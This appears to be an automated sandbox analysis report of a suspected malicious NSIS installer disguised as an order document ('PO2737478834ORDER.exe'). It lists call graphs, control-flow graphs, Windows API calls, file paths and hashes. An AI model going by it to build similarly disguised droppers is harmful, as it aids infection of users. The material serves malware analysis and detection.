4763 401d26 4762->4763 4764 402bac 17 API calls 4763->4764 4765 401d32 GetDlgItem 4764->4765 4766 402620 4765->4766 4767 402421 4768 402453 4767->4768 4769 402428 4767->4769 4770 402bce 17 API calls 4768->4770 4771 402c0e 17 API calls 4769->4771 4772 40245a 4770->4772 4773 40242f 4771->4773 4778 402c8c 4772->4778 4775 402bce 17 API calls 4773->4775 4776 402467 4773->4776 4777 402440 RegDeleteValueA RegCloseKey 4775->4777 4777->4776 4779 402c9f 4778->4779 4781 402c98 4778->4781 4779->4781 4782 402cd0 4779->4782 4781->4776 4783 405f47 RegOpenKeyExA 4782->4783 4784 402cfe 4783->4784 4785 402d0e RegEnumValueA 4784->4785 4792 402da8 4784->4792 4794 402d31 4784->4794 4786 402d98 RegCloseKey 4785->4786 4785->4794 4786->4792 4787 402d6d RegEnumKeyA 4788 402d76 RegCloseKey 4787->4788 4787->4794 4789 4064ca 5 API calls 4788->4789 4790 402d86 4789->4790 4790->4792 4793 402d8a RegDeleteKeyA 4790->4793 4791 402cd0 6 API calls 4791->4794 4792->4781 4793->4792 4794->4786 4794->4787 4794->4788 4794->4791 4795 4027a1 4796 402bce 17 API calls 4795->4796 4797 4027a8 FindFirstFileA 4796->4797 4798 4027cb 4797->4798 4802 4027bb 4797->4802 4799 4027d2 4798->4799 4803 40601f wsprintfA 4798->4803 4804 4060c1 lstrcpynA 4799->4804 4803->4799 4804->4802 3343 405326 3344 4054d1 3343->3344 3345 405348 GetDlgItem GetDlgItem GetDlgItem 3343->3345 3347 405501 3344->3347 3348 4054d9 GetDlgItem CreateThread FindCloseChangeNotification 3344->3348 3389 40417a SendMessageA 3345->3389 3350 40552f 3347->3350 3352 405550 3347->3352 3353 405517 ShowWindow ShowWindow 3347->3353 3348->3347 3423 4052ba OleInitialize 3348->3423 3349 4053b8 3357 4053bf GetClientRect GetSystemMetrics SendMessageA SendMessageA 3349->3357 3351 405537 3350->3351 3358 40558a 3350->3358 3354 405563 ShowWindow 3351->3354 3355 40553f 3351->3355 3398 4041ac 3352->3398 3394 40417a SendMessageA 3353->3394 3362 405583 3354->3362 3363 405575 3354->3363 3395 40411e 3355->3395 3364 405411 SendMessageA SendMessageA 3357->3364 3365 40542d 3357->3365 3358->3352 3366 405597 SendMessageA 3358->3366 3361 40555c 3368 40411e SendMessageA 3362->3368 3412 4051e8 3363->3412 3364->3365 3369 405440 3365->3369 3370 405432 SendMessageA 3365->3370 3366->3361 3371 4055b0 CreatePopupMenu 3366->3371 3368->3358 3390 404145 3369->3390 3370->3369 3372 406154 17 API calls 3371->3372 3374 4055c0 AppendMenuA 3372->3374 3376 4055f1 TrackPopupMenu 3374->3376 3377 4055de GetWindowRect 3374->3377 3375 405450 3378 405459 ShowWindow 3375->3378 3379 40548d GetDlgItem SendMessageA 3375->3379 3376->3361 3380 40560d 3376->3380 3377->3376 3381 40547c 3378->3381 3382 40546f ShowWindow 3378->3382 3379->3361 3383 4054b4 SendMessageA SendMessageA 3379->3383 3384 40562c SendMessageA 3380->3384 3393 40417a SendMessageA 3381->3393 3382->3381 3383->3361 3384->3384 3385 405649 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3384->3385 3387 40566b SendMessageA 3385->3387 3387->3387 3388 40568d GlobalUnlock SetClipboardData CloseClipboard 3387->3388 3388->3361 3389->3349 3391 406154 17 API calls 3390->3391 3392 404150 SetDlgItemTextA 3391->3392 3392->3375 3393->3379 3394->3350 3396 404125 3395->3396 3397 40412b SendMessageA 3395->3397 3396->3397 3397->3352 3399 40426f 3398->3399 3400 4041c4 GetWindowLongA 3398->3400 3399->3361 3400->3399 3401 4041d9 3400->3401 3401->3399 3402 404206 GetSysColor 3401->3402 3403 404209 3401->3403 3402->3403 3404 404219 SetBkMode 3403->3404 3405 40420f SetTextColor 3403->3405 3406 404231 GetSysColor 3404->3406 3407 404237 3404->3407 3405->3404 3406->3407 3408 404248 3407->3408 3409 40423e SetBkColor 3407->3409 3408->3399 3410 404262 CreateBrushIndirect 3408->3410 3411 40425b DeleteObject 3408->3411 3409->3408 3410->3399 3411->3410 3413 4052a6 3412->3413 3414 405203 3412->3414 3413->3362 3415 405220 lstrlenA 3414->3415 3416 406154 17 API calls 3414->3416 3417 405249 3415->3417 3418 40522e lstrlenA 3415->3418 3416->3415 3419 40525c 3417->3419 3420 40524f SetWindowTextA 3417->3420 3418->3413 3421 405240 lstrcatA 3418->3421 3419->3413 3422 405262 SendMessageA SendMessageA SendMessageA 3419->3422 3420->3419 3421->3417 3422->3413 3430 404191 3423->3430 3425 405304 3426 404191 SendMessageA 3425->3426 3427 405316 OleUninitialize 3426->3427 3428 4052dd 3428->3425 3433 401389 3428->3433 3431 4041a9 3430->3431 3432 40419a SendMessageA 3430->3432 3431->3428 3432->3431 3435 401390 3433->3435 3434 4013fe 3434->3428 3435->3434 3436 4013cb MulDiv SendMessageA 3435->3436 3436->3435 4812 402626 4813 40262b 4812->4813 4814 40263f 4812->4814 4815 402bac 17 API calls 4813->4815 4816 402bce 17 API calls 4814->4816 4818 402634 4815->4818 4817 402646 lstrlenA 4816->4817 4817->4818 4819 405d01 WriteFile 4818->4819 4820 402668 4818->4820 4819->4820 4821 404928 4822 404954 4821->4822 4823 404938 4821->4823 4825 404987 4822->4825 4826 40495a SHGetPathFromIDListA 4822->4826 4832 4057c1 GetDlgItemTextA 4823->4832 4828 404971 SendMessageA 4826->4828 4829 40496a 4826->4829 4827 404945 SendMessageA 4827->4822 4828->4825 4831 40140b 2 API calls 4829->4831 4831->4828 4832->4827 4833 401c2e 4834 402bac 17 API calls 4833->4834 4835 401c35 4834->4835 4836 402bac 17 API calls 4835->4836 4837 401c42 4836->4837 4838 401c57 4837->4838 4840 402bce 17 API calls 4837->4840 4839 401c67 4838->4839 4841 402bce 17 API calls 4838->4841 4842 401c72 4839->4842 4843 401cbe 4839->4843 4840->4838 4841->4839 4844 402bac 17 API calls 4842->4844 4845 402bce 17 API calls 4843->4845 4846 401c77 4844->4846 4847 401cc3 4845->4847 4849 402bac 17 API calls 4846->4849 4848 402bce 17 API calls 4847->4848 4850 401ccc FindWindowExA 4848->4850 4851 401c83 4849->4851 4854 401cea 4850->4854 4852 401c90 SendMessageTimeoutA 4851->4852 4853 401cae SendMessageA 4851->4853 4852->4854 4853->4854 4855 4042b0 4856 4042c6 4855->4856 4864 4043d2 4855->4864 4858 404145 18 API calls 4856->4858 4857 404441 4859 40450b 4857->4859 4860 40444b GetDlgItem 4857->4860 4861 40431c 4858->4861 4866 4041ac 8 API calls 4859->4866 4862 404461 4860->4862 4863 4044c9 4860->4863 4865 404145 18 API calls 4861->4865 4862->4863 4870 404487 SendMessageA LoadCursorA SetCursor 4862->4870 4863->4859 4871 4044db 4863->4871 4864->4857 4864->4859 4867 404416 GetDlgItem SendMessageA 4864->4867 4869 404329 CheckDlgButton 4865->4869 4880 404506 4866->4880 4888 404167 KiUserCallbackDispatcher 4867->4888 4886 404167 KiUserCallbackDispatcher 4869->4886 4889 404554 4870->4889 4875 4044e1 SendMessageA 4871->4875 4876 4044f2 4871->4876 4872 40443c 4877 404530 SendMessageA 4872->4877 4875->4876 4876->4880 4881 4044f8 SendMessageA 4876->4881 4877->4857 4878 404347 GetDlgItem 4887 40417a SendMessageA 4878->4887 4881->4880 4883 40435d SendMessageA 4884 404384 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4883->4884 4885 40437b GetSysColor 4883->4885 4884->4880 4885->4884 4886->4878 4887->4883 4888->4872 4892 4057a3 ShellExecuteExA 4889->4892 4891 4044ba LoadCursorA SetCursor 4891->4863 4892->4891 4900 401e35 GetDC 4901 402bac 17 API calls 4900->4901 4902 401e47 GetDeviceCaps MulDiv ReleaseDC 4901->4902 4903 402bac 17 API calls 4902->4903 4904 401e78 4903->4904 4905 406154 17 API calls 4904->4905 4906 401eb5 CreateFontIndirectA 4905->4906 4907 402620 4906->4907 4908 4014b7 4909 4014bd 4908->4909 4910 401389 2 API calls 4909->4910 4911 4014c5 4910->4911 4912 402dba 4913 402dc9 SetTimer 4912->4913 4915 402de2 4912->4915 4913->4915 4914 402e37 4915->4914 4916 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4915->4916 4916->4914 4110 4015bb 4111 402bce 17 API calls 4110->4111 4112 4015c2 4111->4112 4113 405af2 4 API calls 4112->4113 4119 4015ca 4113->4119 4114 401624 4116 401652 4114->4116 4117 401629 4114->4117 4115 405a84 CharNextA 4115->4119 4121 401423 24 API calls 4116->4121 4129 401423 4117->4129 4119->4114 4119->4115 4123 40572b 2 API calls 4119->4123 4124 405748 5 API calls 4119->4124 4127 40160c GetFileAttributesA 4119->4127 4128 4056ae 4 API calls 4119->4128 4126 40164a 4121->4126 4123->4119 4124->4119 4125 40163b SetCurrentDirectoryA 4125->4126 4127->4119 4128->4119 4130 4051e8 24 API calls 4129->4130 4131 401431 4130->4131 4132 4060c1 lstrcpynA 4131->4132 4132->4125 4917 4016bb 4918 402bce 17 API calls 4917->4918 4919 4016c1 GetFullPathNameA 4918->4919 4922 4016d8 4919->4922 4926 4016f9 4919->4926 4920 402a5a 4921 40170d GetShortPathNameA 4921->4920 4923 406435 2 API calls 4922->4923 4922->4926 4924 4016e9 4923->4924 4924->4926 4927 4060c1 lstrcpynA 4924->4927 4926->4920 4926->4921 4927->4926 4928 4067be 4932 406642 4928->4932 4929 406fad 4930 4066c3 GlobalFree 4931 4066cc GlobalAlloc 4930->4931 4931->4929 4931->4932 4932->4929 4932->4930 4932->4931 4932->4932 4933 406743 GlobalAlloc 4932->4933 4934 40673a GlobalFree 4932->4934 4933->4929 4933->4932 4934->4933

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 700d1096-700d10de call 700d17c3 3 700d10e4-700d1124 GetModuleFileNameA GlobalAlloc 0->3 4 700d1221-700d1235 GlobalAlloc 0->4 6 700d1127-700d112a 3->6 5 700d1238-700d124e 4->5 7 700d126f 5->7 8 700d1250-700d126a FindWindowExA * 2 5->8 9 700d112c-700d1144 CharPrevA 6->9 10 700d1146-700d114e 6->10 11 700d1275-700d128a call 700d1a82 call 700d18b9 7->11 8->7 9->6 9->10 12 700d1166-700d1194 GetTempFileNameA CopyFileA 10->12 13 700d1150-700d1161 call 700d1ac2 GlobalFree 10->13 25 700d128c-700d1299 call 700d190d 11->25 26 700d129b-700d12a5 lstrcmpiA 11->26 14 700d11ff-700d121f lstrcatA lstrlenA 12->14 15 700d1196-700d11c9 CreateFileA CreateFileMappingA MapViewOfFile 12->15 23 700d1517-700d151b 13->23 14->5 18 700d11cb-700d11eb UnmapViewOfFile 15->18 19 700d11f1-700d11f9 CloseHandle * 2 15->19 18->19 19->14 30 700d12bc-700d12be 25->30 27 700d12a7-700d12ae 26->27 28 700d12b0-700d12ba lstrcmpiA 26->28 27->30 28->30 31 700d12c0-700d12c2 28->31 30->11 33 700d12ef-700d1362 GetVersion 31->33 34 700d12c4-700d12d4 call 700d1ac2 31->34 36 700d1364-700d136c 33->36 37 700d1390-700d139b 33->37 46 700d12d9-700d12dc 34->46 47 700d12d6 34->47 41 700d136e 36->41 42 700d1373-700d1388 GlobalAlloc 36->42 38 700d139d-700d13c1 InitializeSecurityDescriptor SetSecurityDescriptorDacl 37->38 39 700d13c4-700d13db CreatePipe 37->39 38->39 44 700d144a-700d1456 lstrcpyA 39->44 45 700d13dd-700d13ee CreatePipe 39->45 41->42 43 700d138e 42->43 42->44 43->37 49 700d145c-700d1462 44->49 45->44 48 700d13f0-700d1444 GetStartupInfoA CreateProcessA 45->48 50 700d12de-700d12e1 DeleteFileA 46->50 51 700d12e7 46->51 47->46 48->44 52 700d151c-700d1525 GetTickCount 48->52 53 700d146a-700d146d 49->53 54 700d1464-700d1465 call 700d1ac2 49->54 50->51 51->33 58 700d152a-700d153e WaitForSingleObject GetExitCodeProcess 52->58 56 700d146f-700d1471 53->56 57 700d147e-700d1485 53->57 54->53 56->57 61 700d1473-700d147d call 700d183d 56->61 59 700d1499-700d149f 57->59 60 700d1487-700d1493 lstrcpyA 57->60 62 700d1544-700d1558 PeekNamedPipe 58->62 65 700d14b9-700d14f2 call 700d1ac2 CloseHandle * 6 59->65 66 700d14a1-700d14b6 wsprintfA 59->66 60->59 61->57 63 700d172e-700d1731 62->63 64 700d155e-700d1598 GetTickCount ReadFile 62->64 63->49 68 700d1737-700d173c 63->68 69 700d159a-700d159e 64->69 70 700d1603-700d1606 64->70 83 700d14f4 65->83 84 700d14f7-700d14fa 65->84 66->65 73 700d176f-700d1777 Sleep 68->73 74 700d173e-700d174b GetTickCount 68->74 69->70 75 700d15a0-700d15a9 69->75 76 700d177c-700d177f 70->76 77 700d160c-700d160f 70->77 73->58 74->73 79 700d174d-700d176a TerminateProcess lstrcpyA 74->79 80 700d15ab-700d15ad 75->80 81 700d15b7-700d15bf 75->81 76->58 77->58 82 700d1615-700d161b 77->82 79->58 80->81 85 700d15af-700d15b5 80->85 87 700d15cd 81->87 88 700d15c1-700d15c7 81->88 86 700d161e-700d1626 82->86 83->84 89 700d14fc-700d14ff DeleteFileA 84->89 90 700d1505-700d1512 GlobalFree 84->90 85->81 91 700d15f0 85->91 86->62 92 700d162c-700d162f 86->92 94 700d15d0-700d15d3 87->94 88->87 93 700d15c9-700d15cb 88->93 89->90 90->23 95 700d1514-700d1515 GlobalFree 90->95 98 700d15f5-700d15fc 91->98 96 700d163c-700d1646 92->96 97 700d1631-700d1635 92->97 93->87 93->98 99 700d15fe 94->99 100 700d15d5-700d15d8 94->100 95->23 103 700d1648-700d164b 96->103 104 700d166a-700d166c 96->104 97->86 102 700d1637 97->102 98->94 101 700d1600 99->101 100->99 105 700d15da-700d15e1 100->105 101->70 102->62 106 700d164d-700d1650 103->106 107 700d1694-700d1697 103->107 109 700d166e-700d1671 104->109 110 700d1673-700d1675 104->110 105->99 108 700d15e3-700d15e9 105->108 112 700d16b9-700d16bc 106->112 114 700d1652-700d1668 lstrcpyA 106->114 107->112 113 700d1699 107->113 108->99 115 700d15eb-700d15ee 108->115 109->110 116 700d16ae-700d16b4 109->116 110->107 111 700d1677-700d167a 110->111 111->107 117 700d167c-700d1692 call 700d183d 111->117 119 700d16be-700d16d3 GlobalReAlloc 112->119 120 700d16ea-700d170b call 700d1784 112->120 118 700d169b-700d16ac 113->118 114->116 115->101 116->86 117->116 118->116 118->118 122 700d16d5-700d16e5 119->122 123 700d1710-700d1729 lstrcpyA 119->123 120->58 122->82 123->58
                                                        APIs
                                                          • Part of subcall function 700D17C3: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,700D10DC), ref: 700D17CC
                                                          • Part of subcall function 700D17C3: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,700D10DC), ref: 700D17DA
                                                          • Part of subcall function 700D17C3: GetProcAddress.KERNEL32(00000000,?), ref: 700D17F9
                                                        • GetModuleFileNameA.KERNEL32(?,00000104), ref: 700D10F6
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 700D110C
                                                        • CharPrevA.USER32(?,?), ref: 700D1134
                                                        • GlobalFree.KERNEL32(00000000), ref: 700D115B
                                                        • GetTempFileNameA.KERNEL32(?,700D3050,00000000,?), ref: 700D1178
                                                        • CopyFileA.KERNEL32(?,?,00000000), ref: 700D118C
                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 700D11A4
                                                        • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 700D11B3
                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 700D11C1
                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 700D11EB
                                                        • CloseHandle.KERNEL32(00000000), ref: 700D11F2
                                                        • CloseHandle.KERNEL32(00000000), ref: 700D11F9
                                                        • lstrcatA.KERNEL32(?,700D304C), ref: 700D1207
                                                        • lstrlenA.KERNEL32(?), ref: 700D1210
                                                        • GlobalAlloc.KERNELBASE(00000040,00000401), ref: 700D122D
                                                        • FindWindowExA.USER32(000204B0,00000000,#32770,00000000), ref: 700D1265
                                                        • FindWindowExA.USER32(00000000), ref: 700D1268
                                                        • lstrcmpiA.KERNEL32(00000000,/OEM), ref: 700D12A1
                                                        • lstrcmpiA.KERNEL32(00000000,/MBCS), ref: 700D12B6
                                                        • DeleteFileA.KERNEL32(?,error), ref: 700D12E1
                                                        • GetVersion.KERNEL32 ref: 700D1327
                                                        • GlobalAlloc.KERNEL32(00000040,00000401), ref: 700D137A
                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 700D13A5
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 700D13B5
                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 700D13D7
                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 700D13EA
                                                        • GetStartupInfoA.KERNEL32(00000044), ref: 700D13F7
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 700D143C
                                                        • lstrcpyA.KERNEL32(?,error), ref: 700D1456
                                                        • lstrcpyA.KERNEL32(?,error), ref: 700D1493
                                                        • wsprintfA.USER32 ref: 700D14B0
                                                        • CloseHandle.KERNEL32(?,?), ref: 700D14CE
                                                        • CloseHandle.KERNEL32(?), ref: 700D14D3
                                                        • CloseHandle.KERNEL32(?), ref: 700D14D8
                                                        • CloseHandle.KERNEL32(?), ref: 700D14DD
                                                        • CloseHandle.KERNEL32(?), ref: 700D14E2
                                                        • CloseHandle.KERNEL32(?), ref: 700D14E7
                                                        • DeleteFileA.KERNEL32(?), ref: 700D14FF
                                                        • GlobalFree.KERNEL32(?), ref: 700D150E
                                                        • GlobalFree.KERNEL32(00000002), ref: 700D1515
                                                        • GetTickCount.KERNEL32 ref: 700D151C
                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 700D152E
                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 700D153E
                                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 700D154F
                                                        • GetTickCount.KERNEL32 ref: 700D155E
                                                        • ReadFile.KERNEL32(?,?,00000400,?,00000000), ref: 700D157E
                                                        • lstrcpyA.KERNEL32(?, ), ref: 700D165A
                                                        • GlobalReAlloc.KERNEL32(00000002,?,00000042), ref: 700D16CB
                                                        • lstrcpyA.KERNEL32(?,error), ref: 700D171C
                                                        • GetTickCount.KERNEL32 ref: 700D173E
                                                        • TerminateProcess.KERNEL32(?,000000FF), ref: 700D1752
                                                        • lstrcpyA.KERNEL32(?,timeout), ref: 700D1764
                                                        • Sleep.KERNELBASE(00000064), ref: 700D1771
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1269455905.00000000700D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700D0000, based on PE: true
                                                        • Associated: 00000000.00000002.1269440399.00000000700D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269485100.00000000700D2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269504555.00000000700D3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269540924.00000000700D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_700d0000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CountFreePipeTick$DeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCharCodeCopyCurrentDaclExitInfoInitializeMappingNamedObjectPeekPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcatlstrlenwsprintf
                                                        • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$D$SysListView32$error$timeout$x0p
                                                        • API String ID: 2662719652-548421648
                                                        • Opcode ID: 43117b8dcaea2ba6994aeb37905762a50da23075fdbb231978e3add4675ddff4
                                                        • Instruction ID: e498ea4b28230cc121edfaf6aa2c098bdca1916175a04d2431ff4f433109428e
                                                        • Opcode Fuzzy Hash: 43117b8dcaea2ba6994aeb37905762a50da23075fdbb231978e3add4675ddff4
                                                        • Instruction Fuzzy Hash: 38224A72D00249FFDB119FB5CD84AEEBBBAAF48721F20416AE906A6311DB345945CF70

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 127 403312-403351 SetErrorMode GetVersion 128 403353-40335b call 4064ca 127->128 129 403364 127->129 128->129 135 40335d 128->135 131 403369-40337c call 40645c lstrlenA 129->131 136 40337e-40339a call 4064ca * 3 131->136 135->129 143 4033ab-403409 #17 OleInitialize SHGetFileInfoA call 4060c1 GetCommandLineA call 4060c1 136->143 144 40339c-4033a2 136->144 151 403415-40342a call 405a84 CharNextA 143->151 152 40340b-403410 143->152 144->143 148 4033a4 144->148 148->143 155 4034ef-4034f3 151->155 152->151 156 4034f9 155->156 157 40342f-403432 155->157 160 40350c-403526 GetTempPathA call 4032e1 156->160 158 403434-403438 157->158 159 40343a-403442 157->159 158->158 158->159 161 403444-403445 159->161 162 40344a-40344d 159->162 170 403528-403546 GetWindowsDirectoryA lstrcatA call 4032e1 160->170 171 40357e-403598 DeleteFileA call 402ea1 160->171 161->162 164 403453-403457 162->164 165 4034df-4034ec call 405a84 162->165 168 403459-40345f 164->168 169 40346f-40349c 164->169 165->155 183 4034ee 165->183 174 403461-403463 168->174 175 403465 168->175 176 40349e-4034a4 169->176 177 4034af-4034dd 169->177 170->171 185 403548-403578 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032e1 170->185 186 40362c-40363c call 4037fa OleUninitialize 171->186 187 40359e-4035a4 171->187 174->169 174->175 175->169 179 4034a6-4034a8 176->179 180 4034aa 176->180 177->165 182 4034fb-403507 call 4060c1 177->182 179->177 179->180 180->177 182->160 183->155 185->171 185->186 199 403760-403766 186->199 200 403642-403652 call 4057dd ExitProcess 186->200 190 4035a6-4035b1 call 405a84 187->190 191 40361c-403623 call 4038d4 187->191 203 4035b3-4035dc 190->203 204 4035e7-4035f1 190->204 197 403628 191->197 197->186 201 4037e2-4037ea 199->201 202 403768-403781 GetCurrentProcess OpenProcessToken 199->202 209 4037f0-4037f4 ExitProcess 201->209 210 4037ec 201->210 206 4037b3-4037c1 call 4064ca 202->206 207 403783-4037ad LookupPrivilegeValueA AdjustTokenPrivileges 202->207 208 4035de-4035e0 203->208 211 4035f3-403600 call 405b47 204->211 212 403658-40366c call 405748 lstrcatA 204->212 224 4037c3-4037cd 206->224 225 4037cf-4037d9 ExitWindowsEx 206->225 207->206 208->204 217 4035e2-4035e5 208->217 210->209 211->186 221 403602-403618 call 4060c1 * 2 211->221 222 403679-403693 lstrcatA lstrcmpiA 212->222 223 40366e-403674 lstrcatA 212->223 217->204 217->208 221->191 222->186 227 403695-403698 222->227 223->222 224->225 228 4037db-4037dd call 40140b 224->228 225->201 225->228 230 4036a1 call 40572b 227->230 231 40369a-40369f call 4056ae 227->231 228->201 239 4036a6-4036b3 SetCurrentDirectoryA 230->239 231->239 240 4036c0-4036e8 call 4060c1 239->240 241 4036b5-4036bb call 4060c1 239->241 245 4036ee-40370a call 406154 DeleteFileA 240->245 241->240 248 40374b-403752 245->248 249 40370c-40371c CopyFileA 245->249 248->245 251 403754-40375b call 405ea0 248->251 249->248 250 40371e-40373e call 405ea0 call 406154 call 405760 249->250 250->248 260 403740-403747 CloseHandle 250->260 251->186 260->248
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403337
                                                        • GetVersion.KERNEL32 ref: 0040333D
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403370
                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033AC
                                                        • OleInitialize.OLE32(00000000), ref: 004033B3
                                                        • SHGetFileInfoA.SHELL32(0041FCE8,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033CF
                                                        • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004033E4
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PO2737478834ORDER.exe",00000020,"C:\Users\user\Desktop\PO2737478834ORDER.exe",00000000,?,00000007,00000009,0000000B), ref: 00403420
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 0040351D
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040352E
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040353A
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354E
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403556
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403567
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040356F
                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403583
                                                          • Part of subcall function 004064CA: GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                                                          • Part of subcall function 004064CA: GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                                                          • Part of subcall function 004038D4: lstrlenA.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf,1033,Ramplor Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Ramplor Setup: Installing,00000000,00000002,774D3410), ref: 004039C4
                                                          • Part of subcall function 004038D4: lstrcmpiA.KERNEL32(?,.exe), ref: 004039D7
                                                          • Part of subcall function 004038D4: GetFileAttributesA.KERNEL32(Exec), ref: 004039E2
                                                          • Part of subcall function 004038D4: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf), ref: 00403A2B
                                                          • Part of subcall function 004038D4: RegisterClassA.USER32(00423EC0), ref: 00403A68
                                                          • Part of subcall function 004037FA: CloseHandle.KERNEL32(000002E4,00403631,?,?,00000007,00000009,0000000B), ref: 00403805
                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403631
                                                        • ExitProcess.KERNEL32 ref: 00403652
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 0040376F
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403776
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378E
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AD
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004037D1
                                                        • ExitProcess.KERNEL32 ref: 004037F4
                                                          • Part of subcall function 004057DD: MessageBoxIndirectA.USER32(0040A218), ref: 00405838
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
